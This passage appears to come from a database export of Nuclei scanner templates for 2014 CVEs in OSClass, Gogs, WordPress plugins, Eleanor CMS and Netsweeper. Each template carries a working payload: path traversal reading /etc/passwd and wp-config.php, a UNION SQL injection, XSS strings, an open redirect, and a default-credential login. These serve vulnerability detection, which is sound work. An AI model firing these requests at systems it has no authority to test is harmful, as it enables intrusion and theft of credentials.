Security Advisory 3.4.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-6308\n - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435\n - https://www.netsparker.com/lfi-vulnerability-in-osclass/\n - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-6308\n cwe-id: CWE-22\n epss-score: 0.0922\n epss-percentile: 0.94519\n cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: osclass\n product: osclass\n tags: cve2014,cve,lfi,packetstorm,osclass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b55ba5c5bc0603bce568d991022be9818e26de9699fdecf5a734aa850dc13200022042473693f82c1c425062e207b10679c75162af12660a60d0038719261ec111d8:922c64590222798bb761d5b6d8e72950", "hash": "9babb6addf6d877a3d69f838759a4edd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2a" }, "name": "CVE-2014-8676.yaml", "content": "id: CVE-2014-8676\n\ninfo:\n name: Simple Online Planning Tool <1.3.2 - Local File 
Inclusion\n author: 0x_Akoko\n severity: medium\n description: |\n SOPlanning <1.32 contains a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html\n - https://www.exploit-db.com/exploits/37604/\n - http://seclists.org/fulldisclosure/2015/Jul/44\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8676\n - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2014-8676\n cwe-id: CWE-22\n epss-score: 0.00195\n epss-percentile: 0.56456\n cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: soplanning\n product: soplanning\n tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950", "hash": "f6431640d245a50e4b995132849f2d7d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2b" }, "name": "CVE-2014-8682.yaml", "content": "id: CVE-2014-8682\n\ninfo:\n name: Gogs (Go Git Service) - SQL Injection\n author: dhiyaneshDK,daffainfo\n severity: high\n description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git 
Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8682\n - http://seclists.org/fulldisclosure/2014/Nov/33\n - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html\n - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d\n - https://www.exploit-db.com/exploits/35238\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-8682\n cwe-id: CWE-89\n epss-score: 0.00808\n epss-percentile: 0.79839\n cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gogits\n product: gogs\n shodan-query: title:\"Sign In - Gogs\"\n tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"ok\":true'\n - '\"data\"'\n - '\"repolink\":\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950", "hash": "3148bf4939fd0cbea59e742bf06a43f2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2c" }, "name": "CVE-2014-8799.yaml", "content": "id: CVE-2014-8799\n\ninfo:\n name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. 
(dot dot) in the src parameter to lib/dp_image.php.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.\n remediation: |\n Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-8799\n - https://www.exploit-db.com/exploits/35346\n - https://wordpress.org/plugins/dukapress/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943\n - https://plugins.trac.wordpress.org/changeset/1024640/dukapress\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-8799\n cwe-id: CWE-22\n epss-score: 0.17844\n epss-percentile: 0.96039\n cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: dukapress\n product: dukapress\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/dukapress\"\n tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n - \"DB_USER\"\n - \"DB_HOST\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950", "hash": "ce24da8cd22ea5748dec7eea3a46950d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2d" }, "name": "CVE-2014-9094.yaml", "content": "id: CVE-2014-9094\n\ninfo:\n name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in 
deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9094\n - http://websecurity.com.ua/7152/\n - http://seclists.org/fulldisclosure/2014/Jul/65\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-9094\n cwe-id: CWE-79\n epss-score: 0.32637\n epss-percentile: 0.96912\n cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: digitalzoomstudio\n product: video_gallery\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/dzs-videogallery\"\n tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Video Gallery WordPress DZS'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100f33fbedc30570d477f0ca3fdf865e0b9d6a89eb72953eab70581c1657322d4d802204db1cd868a9f5b6daafb09716cab8669f1539216ffc9af3df54e317613be7368:922c64590222798bb761d5b6d8e72950", "hash": "94f686bea339c7d0ff5c3ccacc28c527", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2e" }, "name": "CVE-2014-9119.yaml", "content": "id: CVE-2014-9119\n\ninfo:\n name: WordPress DB Backup <=4.5 - Local File Inclusion\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n impact: |\n Allows an attacker to read arbitrary files on the server.\n remediation: |\n Update WordPress DB Backup plugin to version 4.6 or higher.\n reference:\n - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536\n - https://www.exploit-db.com/exploits/35378\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9119\n - https://wpvulndb.com/vulnerabilities/7726\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-9119\n cwe-id: CWE-22\n epss-score: 0.11639\n epss-percentile: 0.95149\n cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: db_backup_project\n product: db_backup\n framework: wordpress\n tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402200ab09228c893b1ee93d8eef722707d966f04b94eaf2b6979ef784accbbca3cd20220253e29578ffae76a82b5b19b0a066d92ae8ebcc1950101953d4b994cd366b495:922c64590222798bb761d5b6d8e72950", "hash": "d5899e8a33af2bb862c62d5f1259ca5d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f2f" }, "name": "CVE-2014-9180.yaml", "content": "id: CVE-2014-9180\n\ninfo:\n name: Eleanor CMS - Open Redirect\n author: Shankar Acharya\n severity: medium\n description: |\n Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n remediation: |\n Update to the latest version of Eleanor CMS to fix the open redirect vulnerability.\n reference:\n - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9180\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2014-9180\n cwe-id: CWE-601\n epss-score: 0.00285\n epss-percentile: 0.6809\n cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: eleanor-cms\n product: eleanor_cms\n shodan-query: html:\"eleanor\"\n tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/go.php?http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950", "hash": "bbb32b8a7449762357cd21bb6f7306bc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f30" }, "name": "CVE-2014-9444.yaml", "content": "id: CVE-2014-9444\n\ninfo:\n name: Frontend Uploader <= 0.9.2 - 
Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.\n impact: |\n Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft.\n remediation: |\n Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9444\n - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-9444\n cwe-id: CWE-79\n epss-score: 0.00287\n epss-percentile: 0.65501\n cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: frontend_uploader_project\n product: frontend_uploader\n framework: wordpress\n tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950", "hash": "17a4b37049f3df68e4d9ef33e93a143d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f31" }, "name": "CVE-2014-9606.yaml", "content": "id: 
CVE-2014-9606\n\ninfo:\n name: Netsweeper 4.0.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9606\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9606\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41261\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950", "hash": "1650518fed549f2ac264f143fa75466b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f32" }, "name": "CVE-2014-9607.yaml", "content": "id: CVE-2014-9607\n\ninfo:\n name: Netsweeper 4.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9607\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9607\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,packetstorm,netsweeper,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: 
word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950", "hash": "4b53b0eca8547a77a9ee403382dc5de2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f33" }, "name": "CVE-2014-9608.yaml", "content": "id: CVE-2014-9608\n\ninfo:\n name: Netsweeper 4.0.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9608\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9608\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 'webadminU='\n - 'webadmin='\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950", "hash": "bc0902626b83e9e52ee6b92edb593049", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f34" }, "name": "CVE-2014-9609.yaml", "content": "id: CVE-2014-9609\n\ninfo:\n name: Netsweeper 4.0.8 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. 
(dot dot) in the log parameter in a stats action.\n impact: |\n An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9609\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2014-9609\n cwe-id: CWE-22\n epss-score: 0.00153\n epss-percentile: 0.51564\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,lfi,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100892f2788bca553f630c6b26ae37681204b18b79f07935ad0067733c4dd4a12d5022028cfe7f92f7ed7a3174ce37145a4c7832af65250a45e5727c3e4443603c9e6ea:922c64590222798bb761d5b6d8e72950", "hash": "6056edb56801e2ad552ae4198d37d339", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f35" }, "name": "CVE-2014-9614.yaml", "content": "id: CVE-2014-9614\n\ninfo:\n name: Netsweeper 4.0.5 - Default Weak Account\n author: daffainfo\n severity: critical\n description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers 
to obtain access via a request to webadmin/.\n impact: |\n An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account.\n remediation: |\n Change the default credentials to strong and unique ones.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9614\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-9614\n cwe-id: CWE-798\n epss-score: 0.01433\n epss-percentile: 0.85223\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,default-login,packetstorm,xss\n\nhttp:\n - raw:\n - |\n POST /webadmin/auth/verification.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/webadmin/start/\n\n login=branding&password=branding&Submit=Login\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: ../common/'\n - 'Location: ../start/'\n condition: or\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: webadminU='\n\n - type: status\n status:\n - 302\n# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950", "hash": "f102340314db87838ada6c3c09261642", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f36" }, "name": "CVE-2014-9615.yaml", "content": "id: CVE-2014-9615\n\ninfo:\n name: Netsweeper 4.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web 
script or HTML via the url parameter to webadmin/deny/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9615\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9615\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 